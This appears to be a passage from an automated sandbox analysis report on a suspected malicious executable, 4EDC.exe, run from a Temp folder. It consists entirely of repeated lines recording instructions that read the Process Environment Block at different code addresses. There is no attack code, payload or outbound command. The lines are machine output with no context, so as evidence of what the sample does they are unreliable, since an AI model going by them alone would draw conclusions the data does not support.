Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D740D mov eax, dword ptr fs:[00000030h] 22_2_6C0D740D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D740D mov eax, dword ptr fs:[00000030h] 22_2_6C0D740D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D740D mov eax, dword ptr fs:[00000030h] 22_2_6C0D740D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01FC01 mov eax, dword ptr fs:[00000030h] 22_2_6C01FC01
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01FC01 mov eax, dword ptr fs:[00000030h] 22_2_6C01FC01
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01FC01 mov eax, dword ptr fs:[00000030h] 22_2_6C01FC01
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01FC01 mov eax, dword ptr fs:[00000030h] 22_2_6C01FC01
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8C14 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8C14
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03BC2C mov eax, dword ptr fs:[00000030h] 22_2_6C03BC2C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C022430 mov eax, dword ptr fs:[00000030h] 22_2_6C022430
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C022430 mov eax, dword ptr fs:[00000030h] 22_2_6C022430
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004439 mov eax, dword ptr fs:[00000030h] 22_2_6C004439
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8450 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8450
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02746D mov eax, dword ptr fs:[00000030h] 22_2_6C02746D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C045C70 mov eax, dword ptr fs:[00000030h] 22_2_6C045C70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01FC77 mov eax, dword ptr fs:[00000030h] 22_2_6C01FC77
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01FC77 mov eax, dword ptr fs:[00000030h] 22_2_6C01FC77
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01FC77 mov eax, dword ptr fs:[00000030h] 22_2_6C01FC77
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01FC77 mov eax, dword ptr fs:[00000030h] 22_2_6C01FC77
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8C75 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8C75
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C001480 mov eax, dword ptr fs:[00000030h] 22_2_6C001480
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00649B mov eax, dword ptr fs:[00000030h] 22_2_6C00649B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00649B mov eax, dword ptr fs:[00000030h] 22_2_6C00649B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00EC9B mov eax, dword ptr fs:[00000030h] 22_2_6C00EC9B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00EC9B mov eax, dword ptr fs:[00000030h] 22_2_6C00EC9B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004CB0 mov eax, dword ptr fs:[00000030h] 22_2_6C004CB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03D4B0 mov eax, dword ptr fs:[00000030h] 22_2_6C03D4B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D9CB3 mov eax, dword ptr fs:[00000030h] 22_2_6C0D9CB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CCC0 mov eax, dword ptr fs:[00000030h] 22_2_6C03CCC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CCC0 mov eax, dword ptr fs:[00000030h] 22_2_6C03CCC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CCC0 mov eax, dword ptr fs:[00000030h] 22_2_6C03CCC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CCC0 mov eax, dword ptr fs:[00000030h] 22_2_6C03CCC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002CDB mov eax, dword ptr fs:[00000030h] 22_2_6C002CDB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8CD6 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8CD6
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BD4E1 mov eax, dword ptr fs:[00000030h] 22_2_6C0BD4E1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C14FB mov eax, dword ptr fs:[00000030h] 22_2_6C0C14FB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C3518 mov eax, dword ptr fs:[00000030h] 22_2_6C0C3518
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C3518 mov eax, dword ptr fs:[00000030h] 22_2_6C0C3518
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C3518 mov eax, dword ptr fs:[00000030h] 22_2_6C0C3518
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F51D mov eax, dword ptr fs:[00000030h] 22_2_6C00F51D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031520 mov eax, dword ptr fs:[00000030h] 22_2_6C031520
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031520 mov eax, dword ptr fs:[00000030h] 22_2_6C031520
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031520 mov eax, dword ptr fs:[00000030h] 22_2_6C031520
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031520 mov eax, dword ptr fs:[00000030h] 22_2_6C031520
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031520 mov eax, dword ptr fs:[00000030h] 22_2_6C031520
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00AD30 mov eax, dword ptr fs:[00000030h] 22_2_6C00AD30
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034D3B mov eax, dword ptr fs:[00000030h] 22_2_6C034D3B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034D3B mov eax, dword ptr fs:[00000030h] 22_2_6C034D3B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034D3B mov eax, dword ptr fs:[00000030h] 22_2_6C034D3B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8D34 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8D34
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C043D43 mov eax, dword ptr fs:[00000030h] 22_2_6C043D43
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B3D40 mov eax, dword ptr fs:[00000030h] 22_2_6C0B3D40
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00354C mov eax, dword ptr fs:[00000030h] 22_2_6C00354C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00354C mov eax, dword ptr fs:[00000030h] 22_2_6C00354C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B8D47 mov eax, dword ptr fs:[00000030h] 22_2_6C0B8D47
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C027D50 mov eax, dword ptr fs:[00000030h] 22_2_6C027D50
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02C577 mov eax, dword ptr fs:[00000030h] 22_2_6C02C577
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02C577 mov eax, dword ptr fs:[00000030h] 22_2_6C02C577
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CB581 mov eax, dword ptr fs:[00000030h] 22_2_6C0CB581
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CB581 mov eax, dword ptr fs:[00000030h] 22_2_6C0CB581
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CB581 mov eax, dword ptr fs:[00000030h] 22_2_6C0CB581
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CB581 mov eax, dword ptr fs:[00000030h] 22_2_6C0CB581
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003591 mov eax, dword ptr fs:[00000030h] 22_2_6C003591
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0335A1 mov eax, dword ptr fs:[00000030h] 22_2_6C0335A1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031DB5 mov eax, dword ptr fs:[00000030h] 22_2_6C031DB5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031DB5 mov eax, dword ptr fs:[00000030h] 22_2_6C031DB5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031DB5 mov eax, dword ptr fs:[00000030h] 22_2_6C031DB5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0015C1 mov eax, dword ptr fs:[00000030h] 22_2_6C0015C1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BFDD3 mov eax, dword ptr fs:[00000030h] 22_2_6C0BFDD3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0395EC mov eax, dword ptr fs:[00000030h] 22_2_6C0395EC
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0095F0 mov eax, dword ptr fs:[00000030h] 22_2_6C0095F0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0095F0 mov ecx, dword ptr fs:[00000030h] 22_2_6C0095F0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B8DF1 mov eax, dword ptr fs:[00000030h] 22_2_6C0B8DF1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00C600 mov eax, dword ptr fs:[00000030h] 22_2_6C00C600
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00C600 mov eax, dword ptr fs:[00000030h] 22_2_6C00C600
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00C600 mov eax, dword ptr fs:[00000030h] 22_2_6C00C600
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C092E14 mov eax, dword ptr fs:[00000030h] 22_2_6C092E14
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C040E21 mov eax, dword ptr fs:[00000030h] 22_2_6C040E21
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BFE3F mov eax, dword ptr fs:[00000030h] 22_2_6C0BFE3F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00A63B mov eax, dword ptr fs:[00000030h] 22_2_6C00A63B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00A63B mov eax, dword ptr fs:[00000030h] 22_2_6C00A63B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03C63D mov eax, dword ptr fs:[00000030h] 22_2_6C03C63D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C096652 mov eax, dword ptr fs:[00000030h] 22_2_6C096652
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C08AE60 mov eax, dword ptr fs:[00000030h] 22_2_6C08AE60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C08AE60 mov eax, dword ptr fs:[00000030h] 22_2_6C08AE60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C08AE60 mov eax, dword ptr fs:[00000030h] 22_2_6C08AE60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C08AE60 mov eax, dword ptr fs:[00000030h] 22_2_6C08AE60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01766D mov eax, dword ptr fs:[00000030h] 22_2_6C01766D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CE6C mov eax, dword ptr fs:[00000030h] 22_2_6C03CE6C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CE6C mov ecx, dword ptr fs:[00000030h] 22_2_6C03CE6C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C033E70 mov eax, dword ptr fs:[00000030h] 22_2_6C033E70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BF674 mov eax, dword ptr fs:[00000030h] 22_2_6C0BF674
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003E80 mov eax, dword ptr fs:[00000030h] 22_2_6C003E80
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003E80 mov eax, dword ptr fs:[00000030h] 22_2_6C003E80
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DE9E mov eax, dword ptr fs:[00000030h] 22_2_6C03DE9E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DE9E mov eax, dword ptr fs:[00000030h] 22_2_6C03DE9E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DE9E mov eax, dword ptr fs:[00000030h] 22_2_6C03DE9E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C092EA3 mov eax, dword ptr fs:[00000030h] 22_2_6C092EA3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0846A7 mov eax, dword ptr fs:[00000030h] 22_2_6C0846A7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0336CC mov eax, dword ptr fs:[00000030h] 22_2_6C0336CC
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8ED6 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8ED6
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C043EE4 mov eax, dword ptr fs:[00000030h] 22_2_6C043EE4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C043EE4 mov eax, dword ptr fs:[00000030h] 22_2_6C043EE4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C043EE4 mov eax, dword ptr fs:[00000030h] 22_2_6C043EE4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0316E0 mov ecx, dword ptr fs:[00000030h] 22_2_6C0316E0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0176E2 mov eax, dword ptr fs:[00000030h] 22_2_6C0176E2
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03C707 mov eax, dword ptr fs:[00000030h] 22_2_6C03C707
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03C707 mov ecx, dword ptr fs:[00000030h] 22_2_6C03C707
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03C707 mov eax, dword ptr fs:[00000030h] 22_2_6C03C707
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034710 mov eax, dword ptr fs:[00000030h] 22_2_6C034710
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02F716 mov eax, dword ptr fs:[00000030h] 22_2_6C02F716
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BDF1D mov ecx, dword ptr fs:[00000030h] 22_2_6C0BDF1D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BDF1D mov eax, dword ptr fs:[00000030h] 22_2_6C0BDF1D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C09FF10 mov eax, dword ptr fs:[00000030h] 22_2_6C09FF10
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C09FF10 mov eax, dword ptr fs:[00000030h] 22_2_6C09FF10
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004F2E mov eax, dword ptr fs:[00000030h] 22_2_6C004F2E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004F2E mov eax, dword ptr fs:[00000030h] 22_2_6C004F2E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006730 mov eax, dword ptr fs:[00000030h] 22_2_6C006730
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006730 mov eax, dword ptr fs:[00000030h] 22_2_6C006730
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006730 mov eax, dword ptr fs:[00000030h] 22_2_6C006730
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03E730 mov eax, dword ptr fs:[00000030h] 22_2_6C03E730
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02B73D mov eax, dword ptr fs:[00000030h] 22_2_6C02B73D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02B73D mov eax, dword ptr fs:[00000030h] 22_2_6C02B73D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00A745 mov eax, dword ptr fs:[00000030h] 22_2_6C00A745
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DF4C mov eax, dword ptr fs:[00000030h] 22_2_6C03DF4C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C095F5F mov eax, dword ptr fs:[00000030h] 22_2_6C095F5F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C095F5F mov eax, dword ptr fs:[00000030h] 22_2_6C095F5F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C095F5F mov eax, dword ptr fs:[00000030h] 22_2_6C095F5F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C095F5F mov eax, dword ptr fs:[00000030h] 22_2_6C095F5F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C095F5F mov eax, dword ptr fs:[00000030h] 22_2_6C095F5F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006F60 mov eax, dword ptr fs:[00000030h] 22_2_6C006F60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006F60 mov eax, dword ptr fs:[00000030h] 22_2_6C006F60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02E760 mov eax, dword ptr fs:[00000030h] 22_2_6C02E760
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02E760 mov eax, dword ptr fs:[00000030h] 22_2_6C02E760
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8F6A mov eax, dword ptr fs:[00000030h] 22_2_6C0D8F6A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CF6A mov eax, dword ptr fs:[00000030h] 22_2_6C03CF6A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CF6A mov eax, dword ptr fs:[00000030h] 22_2_6C03CF6A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032F70 mov eax, dword ptr fs:[00000030h] 22_2_6C032F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032F70 mov eax, dword ptr fs:[00000030h] 22_2_6C032F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032F70 mov eax, dword ptr fs:[00000030h] 22_2_6C032F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032F70 mov eax, dword ptr fs:[00000030h] 22_2_6C032F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032F70 mov eax, dword ptr fs:[00000030h] 22_2_6C032F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032F70 mov eax, dword ptr fs:[00000030h] 22_2_6C032F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032F70 mov eax, dword ptr fs:[00000030h] 22_2_6C032F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov ecx, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
